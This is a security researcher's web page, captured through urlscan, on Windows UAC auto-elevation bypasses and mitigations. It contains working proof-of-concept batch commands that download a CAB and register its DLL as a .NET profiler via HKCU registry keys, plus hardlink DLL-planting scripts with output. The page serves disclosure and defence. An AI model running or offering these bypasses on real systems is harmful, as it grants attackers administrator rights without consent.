skanthak.homepage.t-online.de
Open in
urlscan Pro
2003:2:2:15:80:150:6:138
Public Scan
URL:
https://skanthak.homepage.t-online.de/uacamole.html
Submission: On July 14 via manual from DE — Scanned from DE
Submission: On July 14 via manual from DE — Scanned from DE
Form analysis 0 forms found in the DOM
Text Content
ME, MYSELF & IT
Last upload 06/03/2022 11:04:07
MITIGATE SOME EXPLOITS FOR WINDOWS’® UAC
Purpose Background Information Reason Details Auto-elevating Applications
Vulnerabilities Vulnerabilities of CompMgmtLauncher.exe Vulnerability of
EventVwr.exe Vulnerability of MMC.exe Vulnerability of MMC.exe Vulnerability of
Shortcuts in the Start Menu Blended Vulnerabilities Blended Vulnerabilities
(Continued) Blended Vulnerabilities (Finished) Compound Vulnerabilities MSRC
Case 39303 MSRC Case 64957 Mitigations Mitigation against Exploitation of
CompMgmtLauncher.exe Mitigation against Exploitation of EventVwr.exe Mitigations
against Exploitation of .NET Framework Profiler Mitigations against Exploitation
of HTML Help Mitigations against Exploitation of Vulnerable Shortcuts in the
Start Menu Mitigation against Exploitation of WUSA.exe Mitigation against
Exploitation of MSHTA.exe, CScript.exe and WScript.exe Mitigations against
Exploitation of Compound Vulnerabilities Alternative Mitigation Installation
Update Deinstallation Trivia
PURPOSE
Mitigate some exploits for vulnerabilities introduced with Windows 7 by the
auto-elevation (mis)feature of the braindead security theatre known as User
Account Control:
Note: qUACkery is another adequate name for this abomination!
REASON
As shipped by Microsoft®, all versions of Windows® are unsafe: Windows is still
setup without strict privilege separation, i.e. without separate accounts for
(unprivileged) user(s) and (privileged) administrator(s)!
The TechNet article What's New in User Account Control states for example:
> Because UAC requires an administrator to approve application installations,
> unauthorized applications cannot be installed automatically or without the
> explicit consent of an administrator.
This statement is but wrong: due to the changes introduced with Windows 7,
unauthorised applications can be executed (and installed) automatically, without
the explicit consent of an administrator!
Also see Mark Russinovich’s TechNet magazine articles Inside Windows Vista User
Account Control and Inside Windows 7 User Account Control.
BACKGROUND INFORMATION
> User Account Protection was the preliminary name for a core security component
> of Windows Vista. The component has now been officially named User Account
> Control (UAC).
Windows Vista® introduced the security feature (really: security theatre) User
Account Control: programs which need or want to be run with administrative
privileges and access rights have to ask the user for consent.
This made some (really: a minority of) users quite angry: although these (rather
braindead) users continued to abuse the (privileged) protected administrator
account created during Windows Setup for their daily work (instead to follow
best practise and use an unprivileged limited alias standard user account), they
had to answer a prompt whenever they wanted to perform an administrative task.
Unfortunately Microsoft heard these users and weakened the security feature:
Windows 7 introduced auto-elevation and enabled it for some 55 programs shipped
with Windows 7 and later versions, which don’t prompt for consent any more.
Due to flaws in the design and deficiencies in the implementation of User
Account Control, it can be bypassed trivially in numerous ways with its
auto-elevation (mis)feature enabled. As result, arbitrary programs can then be
run with administrative privileges and access rights without prompting the user
for consent.
To defeat some of these trivial bypasses, auto-elevation must be disabled by
moving the slider of the User Account Control setting to its highest position
titled Always notify, as documented and shown in the MSKB articles 975787 and
4462938.
DETAILS
UAC auto-elevation is enabled for applications which
* have the autoElevate property set in their (embedded) Application Manifest,
* are digitally signed by Microsoft with the Windows Publisher code signing
certificate, and
* are stored in secure alias trusted locations like %SystemRoot%\ and its
subdirectories.
As documented and shown in the MSKB articles 975787 and 4462938, auto-elevation
is performed for enabled applications unless the slider is set to its highest
position titled Always notify; its default setting is but Notify me only when
programs try to make changes to my computer.
AUTO-ELEVATING APPLICATIONS
WINDOWS 7 SP1, X64 ALIAS AMD64 PROCESSOR ARCHITECTURE
64-bit 32-bit AdapterTroubleshooter.exe • • BitLockerWizardElev.exe •
bthudtask.exe • • chkntfs.exe • • cleanmgr.exe • • cliconfg.exe • •
CompMgmtLauncher.exe • ComputerDefaults.exe • • dccw.exe • • dcomcnfg.exe • •
DeviceEject.exe • DeviceProperties.exe • • dfrgui.exe • • djoin.exe •
eudcedit.exe • • eventvwr.exe • • fsquirt.exe • FXSUNATD.exe • hdwwiz.exe • •
ieUnatt.exe • • iscsicli.exe • • iscsicpl.exe • • lpksetup.exe • Mcx2Prov.exe •
MdSched.exe • msconfig.exe • msdt.exe • • msra.exe • MultiDigiMon.exe •
Netplwiz.exe • • newdev.exe • • ntprint.exe • • ocsetup.exe • • odbcad32.exe • •
OptionalFeatures.exe • • PDMSetup.exe • • perfmon.exe • • printui.exe • •
rdpshell.exe • recdisc.exe • rrinstaller.exe • • rstrui.exe • sdbinst.exe • •
sdclt.exe • setupsqm.exe • shrpubw.exe • • slui.exe • SndVol.exe • • sysprep.exe
• SystemPropertiesAdvanced.exe • • SystemPropertiesComputerName.exe • •
SystemPropertiesDataExecutionPrevention.exe • • SystemPropertiesHardware.exe • •
SystemPropertiesPerformance.exe • • SystemPropertiesProtection.exe • •
SystemPropertiesRemote.exe • • taskmgr.exe • • tcmsetup.exe • • TpmInit.exe • •
verifier.exe • • WindowsAnytimeUpgrade.exe • wisptis.exe • wusa.exe • •
WINDOWS 10 2004 AND WINDOWS 10 20H2, X64 ALIAS AMD64 PROCESSOR ARCHITECTURE
64-bit 32-bit BitLockerWizardElev.exe • bthudtask.exe • • changepk.exe •
cleanmgr.exe • • ComputerDefaults.exe • • dccw.exe • • dcomcnfg.exe • •
DeviceEject.exe • DeviceProperties.exe • dfrgui.exe • • djoin.exe •
easinvoker.exe • EASPolicyManagerBrokerHost.exe • eudcedit.exe • • eventvwr.exe
• • fodhelper.exe • fsavailux.exe • fsquirt.exe • • FXSUNATD.exe •
immersivetpmvscmgrsvr.exe • iscsicli.exe • • iscsicpl.exe • • lpksetup.exe •
MdSched.exe • MSchedExe.exe • msconfig.exe • msdt.exe • • msra.exe •
MultiDigiMon.exe • Netplwiz.exe • • newdev.exe • • odbcad32.exe • •
OptionalFeatures.exe • PasswordOnWakeSettingFlyout.exe • • perfmon.exe • •
printui.exe • • rdpshell.exe • recdisc.exe • rrinstaller.exe • • rstrui.exe •
sdclt.exe • shrpubw.exe • • slui.exe • SndVol.exe • •
SystemPropertiesAdvanced.exe • • SystemPropertiesComputerName.exe • •
SystemPropertiesDataExecutionPrevention.exe • • SystemPropertiesHardware.exe • •
SystemPropertiesPerformance.exe • • SystemPropertiesProtection.exe • •
SystemPropertiesRemote.exe • • systemreset.exe • SystemSettingsAdminFlows.exe •
SystemSettingsRemoveDevice.exe • Taskmgr.exe • • tcmsetup.exe • • TpmInit.exe •
• WindowsUpdateElevatedInstaller.exe • WSReset.exe • wusa.exe • •
VULNERABILITIES
The following vulnerabilities can be exploited in standard installations of
Windows 7 and newer versions of Windows NT, without user interaction!
Note: only vulnerabilities and exploits for which a mitigation exists are
presented here, together with their mitigation!
VULNERABILITIES OF COMPMGMTLAUNCHER.EXE
The superfluous application Computer Management Snapin Launcher
CompMgmtLauncher.exe is used to start the Computer Management snap-in
CompMgmt.msc of the Microsoft Management Console; it is one of the about 63
applications shipped with Windows 7 and newer versions of Windows NT which have
auto-elevation enabled.
Note: it is superfluous because the command line "%SystemRoot%\System32\MMC.exe"
"%SystemRoot%\System32\CompMgmt.msc" launches Computer Management directly, and
MMC.exe has auto-elevation enabled too.
CompMgmtLauncher.exe has a major design flaw: instead of launching the command
line "%SystemRoot%\System32\MMC.exe" "%SystemRoot%\System32\CompMgmt.msc" it
launches the shortcut %ALLUSERSPROFILE%\Microsoft\Windows\Start
Menu\Programs\Administrative Tools\Computer Management.lnk alias
%ProgramData%\Microsoft\Windows\Start Menu\Programs\Administrative
Tools\Computer Management.lnk.
An unprivileged user can set the environment variable ALLUSERSPROFILE to the
pathname of an arbitrary directory under his control, create the subdirectory
Microsoft\Windows\Start Menu\Programs\Administrative Tools\ there and then
create the shortcut Computer Management.lnk specifying an arbitrary (rogue)
command line in this subdirectory.
In standard installations of Windows 7 and newer versions of Windows NT,
CompMgmtLauncher.exe launches this command line without UAC prompt with
administrative privileges and access rights.
Note: because the command line %SystemRoot%\System32\CompMgmt.msc of the
shortcut %ALLUSERSPROFILE%\Microsoft\Windows\Start Menu\Programs\Administrative
Tools\Computer Management.lnk specifies no executable file, CompMgmtLauncher.exe
exhibits the (following) vulnerability of EventVwr.exe too.
VULNERABILITY OF EVENTVWR.EXE
The superfluous application Event Viewer Snapin Launcher EventVwr.exe is used to
start the Event Viewer snap-in EventVwr.msc of the MMC.exe; it is one of the
about 63 applications shipped with Windows 7 and newer versions of Windows NT
which have auto-elevation enabled.
Note: it is superfluous because the command line "%SystemRoot%\System32\MMC.exe"
"%SystemRoot%\System32\EventVwr.msc" launches Event Viewer directly, and MMC.exe
has auto-elevation enabled too.
Note: EventVwr.exe exists for backward compatibility with Windows NT4 and
earlier versions of Windows NT only; in Windows 2000 the standalone Event Viewer
application was replaced by the snap-in EventVwr.msc.
EventVwr.exe has a major design flaw: instead of launching the command line
"%SystemRoot%\System32\MMC.exe" "%SystemRoot%\System32\EventVwr.msc" it calls
the Win32 function ShellExecute() to launch EventVwr.msc; to evaluate the
command line to execute, ShellExecute() reads the (unnamed) default values of
the Registry keys HKEY_CLASSES_ROOT\.msc and
HKEY_CLASSES_ROOT\mscfile\Shell\Open\Command.
The (virtual) Registry branch HKEY_CLASSES_ROOT is the overlay of the Registry
branch HKEY_LOCAL_MACHINE\SOFTWARE\Classes with the Registry branch
HKEY_CURRENT_USER\Software\Classes, i.e. the latter takes precedence.
An unprivileged user can create the Registry key
HKEY_CURRENT_USER\Software\Classes\mscfile\Shell\Open\Command and write an
arbitrary (rogue) command line to its (unnamed) default value, or create the
Registry key HKEY_CURRENT_USER\Software\Classes\.msc and write an arbitrary
(rogue) Programmatic Identifier (uacamole for example) to its (unnamed) default
value, then create the Registry key
HKEY_CURRENT_USER\Software\Classes\uacamole\Shell\Open\Command and write an
arbitrary (rogue) command line to its (unnamed) default value.
In standard installations of Windows 7 and newer versions of Windows NT,
EventVwr.exe launches this command line without UAC prompt with administrative
privileges and access rights.
VULNERABILITY OF MMC.EXE
Multiple snap-ins of the Microsoft Management Console are implemented using the
.NET Framework. Registry-Free Profiler Startup and Attach
When .NET Framework is loaded, its Common Language Runtime execution engine
evaluates the environment variables COR_ENABLE_PROFILING and COR_PROFILER, since
.NET Framework 4 additionally COR_PROFILER_PATH, and loads the COM object
specified by them as Code Profiler:
> When both environment variable checks pass, the CLR creates an instance of the
> profiler in a similar manner to the COM CoCreateInstance function. The
> profiler is not loaded through a direct call to CoCreateInstance. Therefore, a
> call to CoInitialize, which requires setting the threading model, is avoided.
The CLR execution engine but fails to implement the security checks added to the
Win32 function CoCreateInstance() in Windows Vista®:
> The Component Object Model (COM) leverages the registry to maintain
> information about all of the COM objects installed on a computer. This
> registry hive (HKEY_CLASSES_ROOT) is a virtual registry hive, which allows for
> both per-user and per-machine object registration. Per-user COM objects
> configurations are stored in HKEY_CURRENT_USER\Software\Classes, while
> per-machine configurations are stored in HKEY_LOCAL_MACHINE\Software\Classes.
> Typically, per-user configurations take precedence.
>
> Beginning with Windows Vista® and Windows Server® 2008, if the integrity level
> of a process is higher than Medium, the COM runtime ignores per-user COM
> configuration and accesses only per-machine COM configuration. This action
> reduces the surface area for elevation of privilege attacks, preventing a
> process with standard user privileges from configuring a COM object with
> arbitrary code and having this code called from an elevated process.
An unprivileged user can set the environment variables and create the Registry
keys and entries below HKEY_CURRENT_USER\Software\Classes\CLSID to register an
arbitrary (rogue) DLL as COM object.
In standard installations of Windows 7 and newer versions of Windows NT, MMC.exe
loads this DLL without UAC prompt with administrative privileges and access
rights.
Note: this vulnerability allows arbitrary code execution in every application
which uses .NET Framework!
Start the Command Processor under the user protected administrator account
created during Windows Setup and run the following (block of) command lines:
REM Copyright © 2017-2022, Stefan Kanthak <stefan.kanthak@nexgo.de>
"%SystemRoot%\System32\BITSAdmin.exe" /TRANSFER Exploit /DOWNLOAD /PRIORITY FOREGROUND https://skanthak.homepage.t-online.de/download/SENTINEL.CAB "%TMP%\SENTINEL.CAB"
"%SystemRoot%\System32\Expand.exe" "%TMP%\SENTINEL.CAB" /F:*.DLL "%TMP%"
SET COR_ENABLE_PROFILING=1
SET COR_PROFILER={32E2F4DA-1BEA-47EA-88F9-C5DAF691C94A}
REM SET COR_PROFILER_PATH=%TMP%\%PROCESSOR_ARCHITECTURE%\SENTINEL.DLL
IF NOT "%PROCESSOR_ARCHITECTURE%" == "x86" (
"%SystemRoot%\System32\Reg.exe" ADD "HKEY_CURRENT_USER\Software\Classes\CLSID\%COR_PROFILER%\InProcServer32" /VE /T REG_SZ /D "%TMP%\%PROCESSOR_ARCHITECTURE%\SENTINEL.DLL" /F
"%SystemRoot%\System32\Reg.exe" ADD "HKEY_CURRENT_USER\Software\Classes\CLSID\%COR_PROFILER%\InProcServer32" /V ThreadingModel /T REG_SZ /D Apartment /F
"%SystemRoot%\System32\Reg.exe" ADD "HKEY_CURRENT_USER\Software\Classes\CLSID\%COR_PROFILER%\InProcServer32" /REG:32 /VE /T REG_SZ /D "%TMP%\I386\SENTINEL.DLL" /F
"%SystemRoot%\System32\Reg.exe" ADD "HKEY_CURRENT_USER\Software\Classes\CLSID\%COR_PROFILER%\InProcServer32" /REG:32 /V ThreadingModel /T REG_SZ /D Apartment /F
) ELSE (
"%SystemRoot%\System32\Reg.exe" ADD "HKEY_CURRENT_USER\Software\Classes\CLSID\%COR_PROFILER%\InProcServer32" /VE /T REG_SZ /D "%TMP%\I386\SENTINEL.DLL" /F
"%SystemRoot%\System32\Reg.exe" ADD "HKEY_CURRENT_USER\Software\Classes\CLSID\%COR_PROFILER%\InProcServer32" /V ThreadingModel /T REG_SZ /D Apartment /F
)
START EventVwr.msc
VULNERABILITY OF MMC.EXE
The help function of the Microsoft Management Console is implemented with HTML
Help: when the F1 key is pressed, MMC.exe calls HHCtrl.ocx, which in turn loads
an arbitrary (rogue) DLL registered by the unprivileged user with the following
Registry entry:
REGEDIT4
[HKEY_CURRENT_USER\Software\Microsoft\HtmlHelp Author]
"Location"="‹path›\\‹filename›.‹extension›"
In standard installations of Windows Vista and newer versions of Windows NT,
‹path›\‹filename›.‹extension› is executed with administrative privileges and
access rights.
Note: this undocumented feature allows arbitrary code execution in every
application which uses HTML Help!
VULNERABILITY OF SHORTCUTS IN THE START MENU
The shortcuts for all snap-ins of the Microsoft Management Console in the
directories %ProgramData%\Microsoft\Windows\Start
Menu\Programs\Accessories\System Tools\ and
%ProgramData%\Microsoft\Windows\Start Menu\Programs\Administrative Tools\ show
the same vulnerability as EventVwr.exe: Windows Explorer processes their command
lines %SystemRoot%\System32\‹filename›.msc just like the Win32 function
ShellExecute() does.
BLENDED VULNERABILITIES
WUSA.exe, the Windows Update Standalone Installer, is yet another of the about
63 applications shipped with Windows 7 and newer versions of Windows NT which
have auto-elevation enabled.
Its /Extract:‹destination› command-line switch allows to extract the contents of
arbitrary cabinet archives into arbitrary destination directories. Because it
runs elevated this feature can be (ab)used to plant DLLs loaded and executed by
other applications which have auto-elevation enabled to gain administrative
privileges and access rights: MMC.exe
The Event Viewer snap-in EventVwr.msc of the Microsoft Management Console
MMC.exe loads and executes ELS.dll, which in turn loads and executes ELSExt.dll;
because ELSExt.dll is not shipped with Windows, an arbitrary (rogue) DLL with
this filename can be planted in the system directory %SystemRoot%\System32\,
from where it is then loaded and executed with administrative privileges and
access rights.
CliConfg.exe
The SQL Client Configuration Utility CliConfg.exe has auto-elevation enabled
too.
It loads and executes NTWDBLib.dll; because NTWDBLib.dll is not shipped with
Windows, an arbitrary (rogue) DLL with this filename can be planted in the
system directory %SystemRoot%\System32\, from where it is then loaded and
executed with administrative privileges and access rights.
SysPrep.exe
The System Preparation Utility SysPrep.exe has auto-elevation enabled too.
In Windows 7 and Windows Server 2008 R2, it loads and executes CryptBase.dll,
CryptSP.dll, DWMAPI.dll, RPCRtRemote.dll and UXTheme.dll; because these DLLs
don’t exist in its application directory %SystemRoot%\System32\SysPrep\,
arbitrary (rogue) DLLs with these filenames can be planted there, from where
they are then loaded and executed with administrative privileges and access
rights.
SetupSQM.exe
The Setup SQM Tool SetupSQM.exe has auto-elevation enabled too.
It loads and executes WDSCore.dll; because WDSCore.dll does not exist in its
application directory %SystemRoot%\System32\OoBE\, an arbitrary (rogue) DLL with
this filename can be planted there, from where it is then loaded and executed
with administrative privileges and access rights.
MCX2Prov.exe
The MCX2 Provisioning Library MCX2Prov.exe has auto-elevation enabled too.
In Windows 7 it loads and executes CryptBase.dll; because CryptBase.dll does not
exist in its application directory %SystemRoot%\eHome\, an arbitrary (rogue) DLL
with this filename can be planted there, from where it is then loaded and
executed with administrative privileges and access rights.
PkgMgr.exe
The Windows Package Manager PkgMgr.exe has auto-elevation enabled too.
It calls DISMHost.exe to perform some of its tasks, which loads and executes
PEProvider.dll; because PEProvider.dll is not shipped with Windows, an arbitrary
(rogue) DLL with this filename can be planted in its application directory
%SystemRoot%\System32\DISM\, from where it is then loaded and executed with
administrative privileges and access rights.
MSHTA.exe, CScript.exe and WScript.exe
In Windows 7 and Windows Server 2008 R2, the applications Microsoft HTML
Application Host MSHTA.exe, Console Based Script Host CScript.exe and Windows
Based Script Host WScript.exe are shipped without embedded Application Manifest.
Windows’ module loader therefore evaluates external (rogue) application
manifests MSHTA.exe.manifest, CScript.exe.manifest and WScript.exe.manifest
planted in the system directory %SystemRoot%\System32\. These application
manifests can enable auto-elevation, resulting in execution of every HTML
Application *.hta, every JScript *.js or *.jse, every VBScript *.vbs or *.vbe,
as well as every other script *.wsf or *.wsh for the Windows Script Host with
administrative privileges and access rights.
BLENDED VULNERABILITIES (CONTINUED)
The Diagnostics Troubleshooting Wizard MSDT.exe performs auto-elevation. Its
satellites, including various DLLs, are installed in multiple subdirectories
%SystemRoot%\Diagnostics\Index\*\ and %SystemRoot%\Diagnostics\System\*\.
Running elevated, MSDT.exe launches the Scripted Diagnostics Native Host
SDiagNHost.exe which loads and executes these DLLs.
On 64-bit installations of Windows, most of them are built for the 64-bit
execution environment, and some of them are built for the 32-bit execution
environment, i.e. the DLLs for one of the execution environments are but
missing!
When searching the PATH for a DLL, Windows’ module loader skips DLLs built for
execution environments other than that of the running process. An unprivileged
user can build the missing DLLs and place them in an arbitrary directory of the
search path, for example the directory %LOCALAPPDATA%\Microsoft\WindowsApps\
alias %USERPROFILE%\AppData\Local\Microsoft\WindowsApps\ introduced with Windows
8.
Note: the (tail of the) search path is controlled by the unprivileged user who
can add arbitrary directories to the user environment variable PATH!
In standard installations of Windows 7 and newer versions of Windows NT,
MSDT.exe loads and executes these DLLs indirect via SDiagNHost.exe without UAC
prompt with administrative privileges and access rights.
Note: this bypass was also found independent and published as MSDT DLL Hijack
UAC bypass.
BLENDED VULNERABILITIES (FINISHED)
Since Windows 8, the Microsoft® Windows Backup command line tool SDCLT.exe
performs auto-elevation. Running elevated it launches the Windows Control Panel
Control.exe, which calls ShellExecute() to open a folder.
ShellExecute() reads the (unnamed) default value of the Registry key
HKEY_CLASSES_ROOT\Folder\Shell\Open\Command and executes the command line found
there.
The (virtual) Registry branch HKEY_CLASSES_ROOT is the overlay of the Registry
branches HKEY_LOCAL_MACHINE\SOFTWARE\Classes and
HKEY_CURRENT_USER\Software\Classes, i.e. the latter takes precedence.
An unprivileged user can create the Registry key
HKEY_CURRENT_USER\Software\Classes\Folder\Shell\Open\Command and write an
arbitrary (rogue) command line to its (unnamed) default value.
In standard installations of Windows 8 and newer versions of Windows NT,
SDCLT.exe launches this command line indirect via Control.exe without UAC prompt
with administrative privileges and access rights.
Note: this bypass was also found independent and published as Yet another sdclt
UAC bypass.
COMPOUND VULNERABILITIES
Since more than 23 (in words: twenty-three) years, Microsoft’s developers as
well as their quality miserability assurance ignore their own companies security
guidance, given for example in the MSDN articles Dynamic-Link Library Security
and Dynamic-Link Library Search Order, the Security Advisory 2269637, the MSKB
articles 2389418 and 2533623, the MSRC post Load Library Safely, plus many more
documents.
Due to this gross incompetence and negligence, almost all applications shipped
with Windows are vulnerable to the well-known and well-documented CWE-426:
Untrusted Search Path as well as CWE-427: Uncontrolled Search Path Element, and
susceptible to the well-known and well-documented CAPEC-471: Search Order
Hijacking.
Several directories below %SystemRoot%\, for example
%SystemRoot%\System32\CatRoot2\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\ and
%SystemRoot%\System32\Microsoft\Crypto\RSA\MachineKeys\, are writable by
unprivileged users, who can copy one of the about 63 (vulnerable) applications
which have the auto-elevation (mis)feature enabled next to any (rogue) DLLs they
load into these directories and execute them there to exploit this vulnerability
and run arbitrary code provided in the DLLs with administrative privileges and
access rights!
Start the Command Processor with delayed variable expansion enabled under the
user protected administrator account created during Windows Setup and run the
following (blocks of) command lines:
REM Copyright © 2011-2022, Stefan Kanthak <stefan.kanthak@nexgo.de>
TITLE Step 1: NetPlWiz.exe shows a (yellow) UAC prompt when started in an untrusted directory
COPY /Y "%SystemRoot%\System32\NetPlWiz.exe" "%ProgramData%\NetPlWiz.exe"
START "Oops!" /WAIT "%ProgramData%\NetPlWiz.exe"
"%SystemRoot%\System32\CertUtil.exe" /ERROR %ERRORLEVEL%
TITLE Step 2: NetPlWiz.exe loads an arbitrary NetPlWiz.dll from an untrusted directory
COPY /Y "%SystemRoot%\System32\ShUnimpl.dll" "%ProgramData%\NetPlWiz.dll"
START "Ouch!" /WAIT "%ProgramData%\NetPlWiz.exe"
"%SystemRoot%\System32\CertUtil.exe" /ERROR %ERRORLEVEL%
TITLE Step 3: NetPlWiz.exe auto-elevates and loads an arbitrary NetPlWiz.dll
COPY /Y NUL: "%ProgramData%\NetPlWiz.log"
DIR "%SystemRoot%" /A:D /B /S 1>"%ProgramData%\NetPlWiz.tmp"
FOR /F "Delims= UseBackQ" %? IN ("%ProgramData%\NetPlWiz.tmp") DO @(
MKLINK /H "%~?\NetPlWiz.exe" "%ProgramData%\NetPlWiz.dll" 2>NUL: && (
MKLINK /H "%~?\NetPlWiz.dll" "%ProgramData%\NetPlWiz.exe"
START "BOOM?" /WAIT "%~?\NetPlWiz.exe"
ECHO !ERRORLEVEL! %~? 1>>"%ProgramData%\NetPlWiz.log"
ERASE "%~?\NetPlWiz.dll"
ERASE "%~?\NetPlWiz.exe"))
ERASE "%ProgramData%\NetPlWiz.dll"
ERASE "%ProgramData%\NetPlWiz.exe"
ERASE "%ProgramData%\NetPlWiz.tmp"
1 file(s) copied.
0x0 (WIN32: 0 ERROR_SUCCESS) -- 0 (0)
Error message text: The operation completed successfully.
CertUtil: -error command completed successfully.
1 file(s) copied.
0xc0000139 (NT: 0xc0000139 STATUS_ENTRYPOINT_NOT_FOUND) -- 3221225785 (-1073741511)
Error message text: {Entry Point Not Found}
The procedure entry point %hs could not be located in the dynamic link library %hs.
CertUtil: -error command completed successfully.
Hardlink created for C:\Windows\Tasks\NetPlWiz.dll <<===>> C:\ProgramData\NetPlWiz.dll
Hardlink created for C:\Windows\Tasks\NetPlWiz.exe <<===>> C:\ProgramData\NetPlWiz.exe
[…]
Hardlink created for C:\Windows\Temp\NetPlWiz.dll <<===>> C:\ProgramData\NetPlWiz.dll
Hardlink created for C:\Windows\Temp\NetPlWiz.exe <<===>> C:\ProgramData\NetPlWiz.exe
Could Not Find C:\Windows\Temp\NetPlWiz.dll
Could Not Find C:\Windows\Temp\NetPlWiz.exe
[…]
REM Copyright © 2011-2022, Stefan Kanthak <stefan.kanthak@nexgo.de>
TITLE Step 1: PrintUI.exe shows a (yellow) UAC prompt when started in an untrusted directory
COPY /Y "%SystemRoot%\System32\PrintUI.exe" "%PUBLIC%\PrintUI.exe"
START "Oops!" /WAIT "%PUBLIC%\PrintUI.exe"
"%SystemRoot%\System32\Net.exe" HELPMSG %ERRORLEVEL%
TITLE Step 2: PrintUI.exe loads an arbitrary PrintUI.dll from an untrusted directory
COPY /Y "%SystemRoot%\System32\ShUnimpl.dll" "%PUBLIC%\PrintUI.dll"
START "Ouch!" /WAIT "%PUBLIC%\PrintUI.exe"
"%SystemRoot%\System32\Net.exe" HELPMSG %ERRORLEVEL%
TITLE Step 3: PrintUI.exe auto-elevates and loads an arbitrary PrintUI.dll
COPY /Y NUL: "%PUBLIC%\PrintUI.log"
DIR "%SystemRoot%" /A:D /B /S 1>"%PUBLIC%\PrintUI.tmp"
FOR /F "Delims= UseBackQ" %? IN ("%PUBLIC%\PrintUI.tmp") DO @(
MKLINK /H "%~?\PrintUI.exe" "%PUBLIC%\PrintUI.dll" 2>NUL: && (
MKLINK /H "%~?\PrintUI.dll" "%PUBLIC%\PrintUI.exe"
START "BOOM?" /WAIT "%~?\PrintUI.exe"
ECHO !ERRORLEVEL! %~? 1>>"%PUBLIC%\PrintUI.log"
ERASE "%~?\PrintUI.dll"
ERASE "%~?\PrintUI.exe"))
ERASE "%PUBLIC%\PrintUI.dll"
ERASE "%PUBLIC%\PrintUI.exe"
ERASE "%PUBLIC%\PrintUI.tmp"
1 file(s) copied.
The operation completed successfully.
1 file(s) copied.
A dynamic link library (DLL) initialization routine failed.
Hardlink created for C:\Windows\Tasks\PrintUI.dll <<===>> C:\Users\Public\PrintUI.dll
Hardlink created for C:\Windows\Tasks\PrintUI.exe <<===>> C:\Users\Public\PrintUI.exe
[…]
Hardlink created for C:\Windows\Temp\PrintUI.dll <<===>> C:\Users\Public\PrintUI.dll
Hardlink created for C:\Windows\Temp\PrintUI.exe <<===>> C:\Users\Public\PrintUI.exe
Could Not Find C:\Windows\Temp\PrintUI.dll
Could Not Find C:\Windows\Temp\PrintUI.exe
[…]
REM Copyright © 2011-2022, Stefan Kanthak <stefan.kanthak@nexgo.de>
IF /I NOT "%SystemDrive%" == "%~d0" EXIT /B
COPY "%SystemRoot%\System32\%~n0.exe" "%~dpn0.exe"
IF ERRORLEVEL 1 EXIT /B
START "OOPS!" /WAIT "%~dpn0.exe"
"%SystemRoot%\System32\Net.exe" HELPMSG %ERRORLEVEL%
COPY "%SystemRoot%\System32\ShUnimpl.dll" "%~dpn0.dll"
IF ERRORLEVEL 1 EXIT /B
START "OUCH!" /WAIT "%~dpn0.exe"
"%SystemRoot%\System32\CertUtil.exe" /ERROR %ERRORLEVEL%
COPY NUL: "%~dpn0.log"
IF ERRORLEVEL 1 EXIT /B
DIR "%ProgramData%" /A:D /B 1>"%~dpn0.tmp"
DIR "%ProgramFiles%" /A:D /B /S 1>>"%~dpn0.tmp"
IF DEFINED ProgramFiles(x86) IF NOT "%ProgramFiles(x86)%" == "%ProgramFiles%" (
DIR "%ProgramFiles(x86)%" /A:D /B /S 1>>"%~dpn0.tmp")
DIR "%SystemRoot%" /A:D /B /S 1>>"%~dpn0.tmp"
SETLOCAL ENABLEDELAYEDEXPANSION
FOR /F "Delims= UseBackQ" %%? IN ("%~dpn0.tmp") DO @(
MKLINK /H "%%~?\%~n0.exe" "%~dpn0.exe" 2>NUL: && (
MKLINK /H "%%~?\%~n0.dll" "%~dpn0.dll"
START "BOOM?" /WAIT "%%~?\%~n0.exe"
ECHO !ERRORLEVEL! %%~? 1>>"%~dpn0.log"
ERASE "%%~?\%~n0.dll"
ERASE "%%~?\%~n0.exe"))
ERASE "%~dpn0.dll"
ERASE "%~dpn0.exe"
ERASE "%~dpn0.tmp"
EXIT /B
MSRC CASE 39303
I reported the vulnerability introduced from the Common Language Runtime of the
.NET Framework to the MSRC, where case number 39303 was assigned.
They replied with the following statement:
> UAC is not a security boundary. As such, this does not meet the bar for an
> explicit down level fix.
OUCH: this vulnerability is in the Common Language Runtime of the .NET
Framework, not in the User Account Control, which can but be bypassed due to it!
Note: User Account Control was but announced and introduced as core security
component:
> User Account Protection was the preliminary name for a core security component
> of Windows Vista. The component has now been officially named User Account
> Control (UAC).
What’s the worth of a core security component that can be bypassed due to
careless or clueless implementation of another component?
What about defense in depth or trustworthy computing?
MSRC CASE 64957
I reported the vulnerability introduced by the user-writable directories to the
MSRC, where case number 64957 was assigned.
They replied with the following statement:
> Thank you again for your research and report. Our analyst has completed their
> review of your report regarding color coded UAC prompts. We were able to
> reproduce the issue as you reported it, but this issue would not meet our bar
> for immediate servicing with a Patch Tuesday security update. Issues involving
> UAC typically do not meet the bar per our servicing criteria published here -
> https://aka.ms/windowscriteria, as we don't consider UAC a hard security
> boundary, but rather, a customizable enhancement to assist in making security
> accessible to all users from home consumers to enterprise customers.
>
> I will be closing this case, but we have notified the UAC team, and this is
> something that they may consider for a future release of Windows. We
> appreciate the opportunity to review your research, and please don't hesitate
> to send us any additional findings at https://aka.ms/secure-at.
Ouch: the vulnerability is not the color code of the UAC prompt, but that
auto-elevation is performed in untrusted directories, with vulnerable
applications, without UAC prompt!
What’s the worth of a core security component that can simply be bypassed by
granting unprivileged users write permission in directories beyond the system
directory due to careless and clueless implementation of the applications that
depend on it?
What about defense in depth or trustworthy computing?
MITIGATIONS
With the mitigations presented here an unprivileged process or user can still
execute CompMgmtLauncher.exe and EventVwr.exe, but they run with the
unprivileged process’ or user’s credentials, not elevated; when they launch
%SystemRoot%\System32\CompMgmt.msc or %SystemRoot%\System32\EventVwr.msc,
elevation is handled during start of %SystemRoot%\System32\MMC.exe.
Note: the mitigations are designed for and have been tested on Windows 7; their
adaption to newer versions of Windows NT is left as an exercise to the reader.
MITIGATION AGAINST EXPLOITATION OF COMPMGMTLAUNCHER.EXE
Replace the command line of the Computer Management context menu entry of the
Computer icon which launches the superfluous CompMgmtLauncher.exe and
additionally inhibit its elevation:
; Copyright © 2016-2022, Stefan Kanthak <stefan.kanthak@nexgo.de>
[Version]
Provider = "Stefan Kanthak"
Signature = "$Windows NT$"
[DefaultInstall]
AddReg = Registry
[Registry]
HKCR,"CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\Shell\Manage\Command",,32,"%16421%\MMC.exe %16421%\CompMgmt.msc"
HKCR,"Launcher.Computer\Shell\Manage\Command",,32,"%16421%\MMC.exe %16421%\CompMgmt.msc"
